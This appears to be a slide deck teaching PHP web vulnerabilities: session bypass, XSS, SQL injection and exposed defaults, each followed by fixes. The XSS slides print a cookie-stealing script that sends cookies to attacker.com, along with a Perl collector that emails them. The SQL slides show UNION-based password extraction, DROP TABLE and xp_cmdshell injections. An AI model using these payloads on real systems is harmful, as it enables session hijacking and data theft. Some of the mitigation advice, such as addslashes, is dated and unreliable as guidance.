Web Vulnerability

Saharudin Saat

Session_start();
 The most common
• No session control (bypass authentication)
• XSS attack (cross site scripting)
• Sql Injection
• Default?
Session Control

Is this site vulnerable?

 Session Control
• User need to login before access system
• Does the code really process the username and
password?
• In This case – no login required
• We can bypass the login page just by inserting the url
http://localhost/latihan/home.php
 Session Control

Intruder can bypass your system just by inserting the url page!!
 Session Control
Recommendation
Use session session_start();
– Every sensitive page must have access level control
E.G if($level =='1')
{
header("Location: admin_menu.php");
}
else if($level=='2')
{
header("Location: approve.php");
} else if($level=='4'){
header("Location: report.php");
 Session Control
check if no password entered
if($pwd==''){ redirect to login page again.
?>
<script language="javascript">
alert("not authorized!!");
window.location = "index.php";
</script>

Validation process need to be on server site to prevent

code injection.

Refer to e-rent folder file name session.php

XSS (cross site scripting)
 XSS (cross site scripting)
• By the succesful code injection into username input box
<script>alert(“Boleh xss”)</script> we know that this site
is vulnerable to xss attack.

• The attacker can do social engineer his victims by

clicking on the malicious url to steal cookies (phishing)
XSS (cross site scripting)
 XSS (cross site scripting)
<html>
<head><title>Look at this!</title>
</head><body><ahref="http://hotwired.lycos.com/webmonk
ey/00/18/index3a_page2.html?tw=
<script>document.location.replace('http://attacker.com/steal
.cgi?'+docum
ent.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/S
HOWBIZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this
CNN story out!</a>
</body>
</html>
 XSS (cross site scripting)
# The QUERY_STRING environment variable should be
filled with
# the cookie text after steal.cgi:
# http://www.attacker.com/steal.cgi?XXXXX
print COOKIES “$ENV{'QUERY_STRING'} from
$ENV{‘REMOTE_ADDR’}\n”;
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker\@attacker.com\n";
print MAIL "From: cookie_steal\@attacker.com\n";
print MAIL "Subject: Stolen Cookie Submission\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL “$ENV{'QUERY_STRING'} from
$ENV{‘REMOTE_ADDR’}\n”;
close (MAIL);
 XSS (cross site scripting)
Recommendation

• Use POST rather than GET in forms. Specify POST in

the method attribute of your forms. Of course, this isn't
appropriate for all of your forms, but it is appropriate
when a form is performing an action, such as buying
stocks. In fact, the HTTP specification requires that GET
be considered safe.
• Use $_POST rather than rely on register_globals. Using
the POST method for form submissions is useless if you
rely on register_globals and reference form variables like
$symbol and $quantity. It is also useless if you use
$_REQUEST.
• Do not focus on convenience.
 SQL injection

Simple sql injection to use valid username and password

 SQL injection

Attacker use the first valid user in table login

 SQL injection
• Attacker might be lucky if the first name
inside table login is an administrator.
• If not? he might want to find administrator
login and password
• Can the attacker do that?
 SQL injection

By inserting union statement in the url, attacker can view all login and
password
 SQL injection
• The original url appear like this
http://localhost/latihan/staffdetail.php?nostaf=654321
• Attacker then might try to do union sql statement to view
username and password inside login table which appear
like this : -http:
//localhost/latihan/staffdetail.php?nostaf=654321%20uni
on%20select%201,2,userid,katalaluan%20from%20admi
nistrator

*Note %20 is unicode for space .

 SQL injection
• If sql injection is possible, it is not impossible for attacker
to drop table by adding drop table statement SELECT *
FROM users WHERE name = 'a';DROP TABLE users;
SELECT * FROM DATA WHERE name LIKE '%';
• In some case, attacker making "EXEC xp_cmdshell 'dir
c:'" the @query argument to view the output of
"dir c:" in the webpage.
 SQL injection
Recommendation

Filter your data.

• This cannot be overstressed. With good data filtering in place, most
security concerns are mitigated, and some are practically
eliminated.

Quote your data.

• If your database allows it (MySQL does), put single quotes around
all values in your SQL statements, regardless of the data type.

Escape your data.

• Sometimes valid data can unintentionally interfere with the format of
the SQL statement itself. Use mysql_escape_string() or an escaping
function native to your particular database. If there isn't a specific
one, addslashes() is a good last resort.
 Default?

Do you realize that other people on the internet can view your default setting?
 Default?

Pay attention for any alert from the third party software about your web security
 Default?

Attacker might browse your server files to find any information

 References
• Security focus-
http://www.securityfocus.com/
• Packetstorm-
http://packetstormsecurity.org/
• Milw0rm-www.milw0rm.com/
• Insecure.org-
http://sectools.org/web-scanners.html
session_destroy();

Thank You